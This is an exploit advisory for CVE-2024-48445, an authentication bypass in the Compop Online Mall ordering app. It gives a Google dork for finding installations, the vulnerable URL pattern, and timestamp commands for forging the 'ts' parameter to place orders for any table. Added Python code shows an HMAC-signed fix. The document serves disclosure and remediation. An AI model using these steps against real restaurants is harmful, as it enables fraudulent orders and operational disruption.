

# Exploit Title: Compop Online Mall Authentication Bypass
# Google Dork: Terms of Use inurl:compop.vip
# Date: 22/12/2024
# Exploit Author: dmlino
# Vendor Homepage: https://www.compop.ca/
# Version: 3.5.3
# CVE : CVE-2024-48445

Vulnerability Overview:
The application relies on a Unix timestamp ("ts") URL parameter as its only authentication check, which is fundamentally flawed: the expected value is simply the current time, so anyone can compute it. By replacing the timestamp with the current time, an attacker bypasses the access controls.

Vulnerable URL Structure:
https://VULNERABLE.COM/Home?rid=11111&tid=1&h5sty=3&et=2&ts=CURRENT_TIMESTAMP

Key Parameters:
rid: Restaurant ID
tid: Table Number
ts: Unix Timestamp (authentication mechanism)

Exploitation Method:
Obtain current Unix timestamp

Linux: date +%s
Windows PowerShell: [int](Get-Date -UFormat %s -Millisecond 0)

Replace "ts" value in URL with current timestamp
Submit modified URL to place unauthorized orders

Impact:
An attacker can place orders for any table by manipulating the timestamp, potentially causing operational disruption for the restaurant.
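As an added example (not part of the original advisory or the vendor's code), the flawed timestamp-only check is shown beside a hardened variant that binds rid, tid and ts to a server-side HMAC with an expiry, so a freshly computed timestamp no longer authenticates. SERVER_SECRET, TOKEN_TTL_SECONDS and the extra "sig" parameter are assumptions for illustration.

```python
import hmac
import hashlib
from urllib.parse import urlencode

# Assumed server-side secret (constructed for this example); a real
# deployment loads it from a secret store, never from the URL.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"
TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime of an issued table link


def is_valid_timestamp_only(ts: int, now: int, window: int = 60) -> bool:
    """Mirrors the flawed check described in the advisory: the only thing
    verified is that 'ts' is close to the server clock. Anyone can satisfy
    it with `date +%s`, so it provides no authentication at all."""
    return abs(now - ts) <= window


def sign_link(rid: str, tid: str, ts: int) -> str:
    """Bind restaurant ID, table ID and issue time to a keyed MAC.
    Only the server, which holds SERVER_SECRET, can produce a valid sig."""
    msg = f"{rid}|{tid}|{ts}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def build_table_link(base: str, rid: str, tid: str, ts: int) -> str:
    """Issue a link that carries its own signature next to the timestamp."""
    params = {"rid": rid, "tid": tid, "ts": ts, "sig": sign_link(rid, tid, ts)}
    return f"{base}/Home?{urlencode(params)}"


def is_valid_signed(rid: str, tid: str, ts: int, sig: str, now: int) -> bool:
    """Hardened check: reject expired or future-dated links, then verify that
    sig matches the (rid, tid, ts) actually presented. Editing ts or tid
    without the secret invalidates sig; compare_digest avoids timing leaks."""
    if ts > now or now - ts > TOKEN_TTL_SECONDS:
        return False
    return hmac.compare_digest(sign_link(rid, tid, ts), sig)
```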